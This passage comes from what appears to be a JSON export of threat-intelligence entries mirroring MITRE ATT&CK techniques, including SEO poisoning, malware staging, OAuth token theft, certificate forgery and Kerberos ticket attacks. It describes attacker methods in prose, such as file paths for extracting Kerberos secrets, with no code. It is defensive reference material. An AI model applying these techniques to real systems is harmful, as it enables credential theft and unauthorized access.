sites hosting their malicious payloads (such as [Drive-by Target](https://app.tidalcyber.com/technique/f2661f07-9027-4d19-9028-d07b7511f3d5)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).[[ZScaler SEO](https://app.tidalcyber.com/references/f117cfa5-1bad-43ae-9eaa-3b9123061f93)][[Atlas SEO](https://app.tidalcyber.com/references/26d7134e-7b93-4aa1-a859-03cf964ca1b5)]\n\nAdversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.[[MalwareBytes SEO](https://app.tidalcyber.com/references/250b09a2-dd97-4fbf-af2f-618d1f126957)][[DFIR Report Gootloader](https://app.tidalcyber.com/references/aa12dc30-ba81-46c5-b412-ca4a01e72d7f)]\n\nSEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.[[ZScaler SEO](https://app.tidalcyber.com/references/f117cfa5-1bad-43ae-9eaa-3b9123061f93)][[Sophos Gootloader](https://app.tidalcyber.com/references/63357292-0f08-4405-a45a-34b606ab7110)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1608.006" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "68d5de9f-ca86-4bd3-bf69-524d82f7bc7a", + "value": "SEO Poisoning" + }, + { + "description": "Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242) by placing it on an Internet accessible web server.\n\nMalware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3)) or was otherwise compromised by them ([Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)). Malware can also be staged on web services, such as GitHub or Pastebin, or hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult.[[Volexity Ocean Lotus November 2020](https://app.tidalcyber.com/references/dbea2493-7e0a-47f0-88c1-5867f8bb1199)][[Talos IPFS 2022](https://app.tidalcyber.com/references/dc98c7ce-0a3f-5f35-9885-6c1c73e5858d)]\n\nAdversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) may increase the chance of users mistakenly executing these files.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1608.001" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "8ecf5275-c6d1-4fe3-a24a-63fa1f3144fe", + "value": "Upload Malware" + }, + { + "description": "Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242) by placing it on an Internet accessible web server.\n\nTools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3)) or was otherwise compromised by them ([Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)).[[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)] Tools can also be staged on web services, such as an adversary controlled GitHub repo, or on Platform-as-a-Service offerings that enable users to easily provision applications.[[Dragos Heroku Watering Hole](https://app.tidalcyber.com/references/8768909c-f511-4067-9a97-6f7dee24f276)][[Malwarebytes Heroku Skimmers](https://app.tidalcyber.com/references/4656cc2c-aff3-4416-b18d-995876d37e06)][[Intezer App Service Phishing](https://app.tidalcyber.com/references/e86abbd9-f349-4d90-8ec9-899fe1637f94)]\n\nAdversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1608.002" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "d7594eaf-286f-4484-94fa-8608c911767a", + "value": "Upload Tool" + }, + { + "description": "Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70)) or obtained ([Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3)) or was otherwise compromised by them ([Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.[[Volexity Ocean Lotus November 2020](https://app.tidalcyber.com/references/dbea2493-7e0a-47f0-88c1-5867f8bb1199)][[Dragos Heroku Watering Hole](https://app.tidalcyber.com/references/8768909c-f511-4067-9a97-6f7dee24f276)][[Malwarebytes Heroku Skimmers](https://app.tidalcyber.com/references/4656cc2c-aff3-4416-b18d-995876d37e06)][[Netskope GCP Redirection](https://app.tidalcyber.com/references/18efeffc-c47b-46ad-8e7b-2eda30a406f0)][[Netskope Cloud Phishing](https://app.tidalcyber.com/references/25d46bc1-4c05-48d3-95f0-aa3ee1100bf9)]\n\nStaging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):\n\n* Staging web resources necessary to conduct [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381) when a user browses to a site.[[FireEye CFR Watering Hole 2012](https://app.tidalcyber.com/references/6108ab77-e4fd-43f2-9d49-8ce9c219ca9c)][[Gallagher 2015](https://app.tidalcyber.com/references/b1540c5c-0bbc-4b9d-9185-fae224ba31be)][[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)]\n* Staging web resources for a link target to be used with spearphishing.[[Malwarebytes Silent Librarian October 2020](https://app.tidalcyber.com/references/9bb8ddd0-a8ec-459b-9983-79ccf46297ca)][[Proofpoint TA407 September 2019](https://app.tidalcyber.com/references/e787e9af-f496-442a-8b36-16056ff8bfc1)]\n* Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242).[[Volexity Ocean Lotus November 2020](https://app.tidalcyber.com/references/dbea2493-7e0a-47f0-88c1-5867f8bb1199)]\n* Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://app.tidalcyber.com/technique/ce822cce-f7f1-4753-bff1-12e5bef66d53) with [Web Protocols](https://app.tidalcyber.com/technique/9a21ec7b-9714-4073-9bf3-4df41995c698)).[[DigiCert Install SSL Cert](https://app.tidalcyber.com/references/a1d7d368-6092-4421-99de-44e458deee21)]", + "meta": { + "platforms": [ + "PRE" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + }, + { + "dest-uuid": "f2661f07-9027-4d19-9028-d07b7511f3d5", + "type": "similar" + }, + { + "dest-uuid": "0b2a9df9-65c8-4a01-a0e6-d411e54a4c7b", + "type": "similar" + }, + { + "dest-uuid": "6824c82b-2959-4402-831a-6e7c2010d1c5", + "type": "similar" + }, + { + "dest-uuid": "68d5de9f-ca86-4bd3-bf69-524d82f7bc7a", + "type": "similar" + }, + { + "dest-uuid": "8ecf5275-c6d1-4fe3-a24a-63fa1f3144fe", + "type": "similar" + }, + { + "dest-uuid": "d7594eaf-286f-4484-94fa-8608c911767a", + "type": "similar" + } + ], + "uuid": "ec2a76e6-3530-43e1-9e80-686e4b214ac8", + "value": "Stage Capabilities" + }, + { + "description": "Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.\n\nApplication access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).[[Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019](https://app.tidalcyber.com/references/8ec52402-7e54-463d-8906-f373e5855018)] OAuth is one commonly implemented framework that issues tokens to users for access to systems. Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.\n\nIn Kubernetes environments, processes running inside a container communicate with the Kubernetes API server using service account tokens. If a container is compromised, an attacker may be able to steal the container’s token and thereby gain access to Kubernetes API commands.[[Kubernetes Service Accounts](https://app.tidalcyber.com/references/a74ffa28-8a2e-4bfd-bc66-969b463bebd9)]\n\nToken theft can also occur through social engineering, in which case user action may be required to grant access. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.[[Microsoft Identity Platform Protocols May 2019](https://app.tidalcyber.com/references/a99d2292-be39-4e55-a952-30c9d6a3d0a3)][[Microsoft - OAuth Code Authorization flow - June 2019](https://app.tidalcyber.com/references/a41c2123-8b8d-4f98-a535-e58e3e746b69)] An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. \n \nAdversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.[[Amnesty OAuth Phishing Attacks, August 2019](https://app.tidalcyber.com/references/0b0f9cf6-f0af-4f86-9699-a63ff36c49e2)][[Trend Micro Pawn Storm OAuth 2017](https://app.tidalcyber.com/references/7d12c764-facd-4086-acd0-5c0287344520)] The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.[[Microsoft - Azure AD App Registration - May 2019](https://app.tidalcyber.com/references/36a06c99-55ca-4163-9450-c3b84ae10039)] Then, they can send a [Spearphishing Link](https://app.tidalcyber.com/technique/d08a9977-9fc2-46bb-84f9-dbb5187c426d) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://app.tidalcyber.com/technique/8592f37d-850a-43d1-86f2-cc981ad7d7dc).[[Microsoft - Azure AD Identity Tokens - Aug 2019](https://app.tidalcyber.com/references/44767d53-8cd7-44dd-a69d-8a7bebc1d87d)]\n\nApplication access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens[[Auth0 Understanding Refresh Tokens](https://app.tidalcyber.com/references/84eb3d8a-f6b1-4bb5-9411-2c8da29b5946)], allowing them to obtain new access tokens without prompting the user. \n\n", + "meta": { + "platforms": [ + "Azure AD", + "Containers", + "Google Workspace", + "Office 365", + "SaaS" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "f78f2c87-626a-468f-93a5-31b61be17727", + "value": "Steal Application Access Token" + }, + { + "description": "Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.[[O365 Blog Azure AD Device IDs](https://app.tidalcyber.com/references/ec94c043-92ef-4691-b21a-7ea68f39e338)][[Microsoft AD CS Overview](https://app.tidalcyber.com/references/f1b2526a-1bf6-4954-a9b3-a5e008761ceb)]\n\nAuthentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)[[APT29 Deep Look at Credential Roaming](https://app.tidalcyber.com/references/691fb596-07b6-5c13-9cec-e28530ffde12)], misplaced certificate files (i.e. [Unsecured Credentials](https://app.tidalcyber.com/technique/02ed857b-ba39-4fab-b1d9-3ed2aa689dfd)), or directly from the Windows certificate store via various crypto APIs.[[SpecterOps Certified Pre Owned](https://app.tidalcyber.com/references/73b6a6a6-c2b8-4aed-9cbc-d3bdcbb97698)][[GitHub CertStealer](https://app.tidalcyber.com/references/da06ce8f-f950-4ae8-a62a-b59b236e91a3)][[GitHub GhostPack Certificates](https://app.tidalcyber.com/references/941e214d-4188-4ca0-9ef8-b26aa96373a2)] With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.[[Medium Certified Pre Owned](https://app.tidalcyber.com/references/04e53c69-3f29-4bb4-83c9-ff3a2db1526b)]\n\nAbusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://app.tidalcyber.com/tactics/50ba4930-7c8e-4ef9-bc36-70e7dae661eb). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://app.tidalcyber.com/tactics/b17dde68-dbcf-4cfd-9bb8-be014ec65c37), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393) via stealing or forging certificates that can be used as [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts.\n\nAdversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393) by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).[[Medium Certified Pre Owned](https://app.tidalcyber.com/references/04e53c69-3f29-4bb4-83c9-ff3a2db1526b)] Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://app.tidalcyber.com/technique/12efebf8-9da4-446c-a627-b6f95524f1ea) ticket-granting tickets (TGT) or NTLM plaintext.[[Medium Certified Pre Owned](https://app.tidalcyber.com/references/04e53c69-3f29-4bb4-83c9-ff3a2db1526b)]", + "meta": { + "platforms": [ + "Azure AD", + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "b8c27b52-3e73-448d-8a7c-3e814c8e3889", + "value": "Steal or Forge Authentication Certificates" + }, + { + "description": "Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://app.tidalcyber.com/technique/7e8c3c70-2e9f-4fa0-b083-ff5610447dc1) Kerberos messages.[[Harmj0y Roasting AS-REPs Jan 2017](https://app.tidalcyber.com/references/bfb01fbf-4dc0-4943-8a21-457f28f4b01f)] \n\nPreauthentication offers protection against offline [Password Cracking](https://app.tidalcyber.com/technique/7e8c3c70-2e9f-4fa0-b083-ff5610447dc1). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.[[Microsoft Kerberos Preauth 2014](https://app.tidalcyber.com/references/328953ed-93c7-46c0-9a05-53dc44d294fe)]\n\nFor each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://app.tidalcyber.com/technique/7e8c3c70-2e9f-4fa0-b083-ff5610447dc1) attacks similarly to [Kerberoasting](https://app.tidalcyber.com/technique/2f980aed-b34a-4300-ac6b-70e7ddf6d9be) and expose plaintext credentials. [[Harmj0y Roasting AS-REPs Jan 2017](https://app.tidalcyber.com/references/bfb01fbf-4dc0-4943-8a21-457f28f4b01f)][[Stealthbits Cracking AS-REP Roasting Jun 2019](https://app.tidalcyber.com/references/3af06034-8384-4de8-9356-e9aaa35b95a2)] \n\nAn account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. [[Harmj0y Roasting AS-REPs Jan 2017](https://app.tidalcyber.com/references/bfb01fbf-4dc0-4943-8a21-457f28f4b01f)][[Stealthbits Cracking AS-REP Roasting Jun 2019](https://app.tidalcyber.com/references/3af06034-8384-4de8-9356-e9aaa35b95a2)]\n\nCracked hashes may enable [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393), [Privilege Escalation](https://app.tidalcyber.com/tactics/b17dde68-dbcf-4cfd-9bb8-be014ec65c37), and [Lateral Movement](https://app.tidalcyber.com/tactics/50ba4930-7c8e-4ef9-bc36-70e7dae661eb) via access to [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).[[SANS Attacking Kerberos Nov 2014](https://app.tidalcyber.com/references/f20d6bd0-d699-4ee4-8ef6-3c45ec12cd42)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1558.004" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "888e603b-ca97-4671-aa43-a25248fc9fc8", + "value": "AS-REP Roasting" + }, + { + "description": "Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.[[AdSecurity Kerberos GT Aug 2015](https://app.tidalcyber.com/references/aac51d49-9a72-4456-8539-8a5f5d0ef7d7)] Golden tickets enable adversaries to generate authentication material for any account in Active Directory.[[CERT-EU Golden Ticket Protection](https://app.tidalcyber.com/references/268f9cfa-71f4-4cb1-96f3-c61e71892d30)] \n\nUsing a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.[[ADSecurity Detecting Forged Tickets](https://app.tidalcyber.com/references/4c328a1a-6a83-4399-86c5-d6e1586da8a3)]\n\nThe KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.[[ADSecurity Kerberos and KRBTGT](https://app.tidalcyber.com/references/6e61f3e1-35e6-44f4-9bc4-60b2bcb71b15)] The KRBTGT password hash may be obtained using [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d) and privileged access to a domain controller.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1558.001" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "12efebf8-9da4-446c-a627-b6f95524f1ea", + "value": "Golden Ticket" + }, + { + "description": "Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c).[[Empire InvokeKerberoast Oct 2016](https://app.tidalcyber.com/references/a358bf8f-166e-4726-adfd-415e953d4ffe)][[AdSecurity Cracking Kerberos Dec 2015](https://app.tidalcyber.com/references/1b018fc3-515a-4ec4-978f-6d5649ceb0c5)] \n\nService principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service[[Microsoft Detecting Kerberoasting Feb 2018](https://app.tidalcyber.com/references/b36d82a8-82ca-4f22-85c0-ee82be3b6940)]).[[Microsoft SPN](https://app.tidalcyber.com/references/985ad31b-c385-473d-978d-40b6cd85268a)][[Microsoft SetSPN](https://app.tidalcyber.com/references/dd5dc432-32de-4bf3-b2c7-0bbdda031dd0)][[SANS Attacking Kerberos Nov 2014](https://app.tidalcyber.com/references/f20d6bd0-d699-4ee4-8ef6-3c45ec12cd42)][[Harmj0y Kerberoast Nov 2016](https://app.tidalcyber.com/references/6f1f8bc3-421e-46ff-88e3-48fcc6f7b76a)]\n\nAdversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).[[Empire InvokeKerberoast Oct 2016](https://app.tidalcyber.com/references/a358bf8f-166e-4726-adfd-415e953d4ffe)][[AdSecurity Cracking Kerberos Dec 2015](https://app.tidalcyber.com/references/1b018fc3-515a-4ec4-978f-6d5649ceb0c5)] Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c) attacks that may expose plaintext credentials.[[AdSecurity Cracking Kerberos Dec 2015](https://app.tidalcyber.com/references/1b018fc3-515a-4ec4-978f-6d5649ceb0c5)][[Empire InvokeKerberoast Oct 2016](https://app.tidalcyber.com/references/a358bf8f-166e-4726-adfd-415e953d4ffe)] [[Harmj0y Kerberoast Nov 2016](https://app.tidalcyber.com/references/6f1f8bc3-421e-46ff-88e3-48fcc6f7b76a)]\n\nThis same behavior could be executed using service tickets captured from network traffic.[[AdSecurity Cracking Kerberos Dec 2015](https://app.tidalcyber.com/references/1b018fc3-515a-4ec4-978f-6d5649ceb0c5)]\n\nCracked hashes may enable [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393), [Privilege Escalation](https://app.tidalcyber.com/tactics/b17dde68-dbcf-4cfd-9bb8-be014ec65c37), and [Lateral Movement](https://app.tidalcyber.com/tactics/50ba4930-7c8e-4ef9-bc36-70e7dae661eb) via access to [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).[[SANS Attacking Kerberos Nov 2014](https://app.tidalcyber.com/references/f20d6bd0-d699-4ee4-8ef6-3c45ec12cd42)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1558.003" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "2f980aed-b34a-4300-ac6b-70e7ddf6d9be", + "value": "Kerberoasting" + }, + { + "description": "Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.[[ADSecurity Silver Tickets](https://app.tidalcyber.com/references/5185560e-b8f0-4c40-8c90-cb12348a0f7f)]\n\nSilver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.[[ADSecurity Detecting Forged Tickets](https://app.tidalcyber.com/references/4c328a1a-6a83-4399-86c5-d6e1586da8a3)]\n\nPassword hashes for target services may be obtained using [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d) or [Kerberoasting](https://app.tidalcyber.com/technique/2f980aed-b34a-4300-ac6b-70e7ddf6d9be).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1558.002" + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + } + ], + "uuid": "e7135af8-3668-4d94-90d2-2a93a6b5c327", + "value": "Silver Ticket" + }, + { + "description": "Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://app.tidalcyber.com/technique/5e771f38-6286-4330-b7b4-38071ad6b68a). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).[[ADSecurity Kerberos Ring Decoder](https://app.tidalcyber.com/references/5f78a554-2d5c-49af-8c6c-6e10f9aec997)] Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.\n\nOn Windows, the built-in klist utility can be used to list and analyze cached Kerberos tickets.[[Microsoft Klist](https://app.tidalcyber.com/references/f500340f-23fc-406a-97ef-0de787ef8cec)]\n\nLinux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the \"ccache\". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.[[MIT ccache](https://app.tidalcyber.com/references/6a1b4373-2304-420c-8733-e1eae71ff7b2)] On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://app.tidalcyber.com/technique/5e771f38-6286-4330-b7b4-38071ad6b68a). The ccache file may also be converted into a Windows format using tools such as Kekeo.[[Linux Kerberos Tickets](https://app.tidalcyber.com/references/5aea042f-4eb1-4092-89be-3db695053470)][[Brining MimiKatz to Unix](https://app.tidalcyber.com/references/5ad06565-6694-4c42-81c9-880d66f6d07f)][[Kekeo](https://app.tidalcyber.com/references/0b69f0f5-dd4a-4926-9369-8253a0c3ddea)]\n\n\nKerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf configuration file and the KRB5CCNAME environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.[[SpectorOps Bifrost Kerberos macOS 2019](https://app.tidalcyber.com/references/58ecb4e9-25fc-487b-9fed-25c781cc531b)][[macOS kerberos framework MIT](https://app.tidalcyber.com/references/8e09346b-03ce-4627-a365-f2f63089d1e0)]\n", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53", + "type": "uses" + }, + { + "dest-uuid": "888e603b-ca97-4671-aa43-a25248fc9fc8", + "type": "similar" + }, + { + "dest-uuid": "12efebf8-9da4-446c-a627-b6f95524f1ea", + "type": "similar" + }, + { + "dest-uuid": "2f980aed-b34a-4300-ac6b-70e7ddf6d9be", + "type": "similar" + }, + { + "dest-uuid": "e7135af8-3668-4d94-90d2-2a93a6b5c327", + "type": "similar" + } + ], + "uuid": "0fef0394-7cf6-4797-8a5e-1cbfd31ee501", + "value": "Steal or Forge Kerberos Tickets" + }, + { + "description": "An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.\n\nCookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.[[Pass The Cookie](https://app.tidalcyber.com/references/dc67930f-5c7b-41be-97e9-d8f4a55e6019)]\n\nThere are several examples of malware targeting cookies from web browsers on the local system.[[Kaspersky TajMahal April 2019](https://app.tidalcyber.com/references/1ed20522-52ae-4d0c-b42e-c680490958ac)][[Unit 42 Mac Crypto Cookies January 2019](https://app.tidalcyber.com/references/0a88e730-8ed2-4983-8f11-2cb2e4abfe3e)] There are also open source frameworks such as `Evilginx2` and `Muraena` that can gather session cookies through a malicious proxy (ex: [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9)) that can be set up by an adversary and used in phishing campaigns.[[Github evilginx2](https://app.tidalcyber.com/references/322e5d90-5095-47ea-b0e2-e7e5fb45fcca)][[GitHub 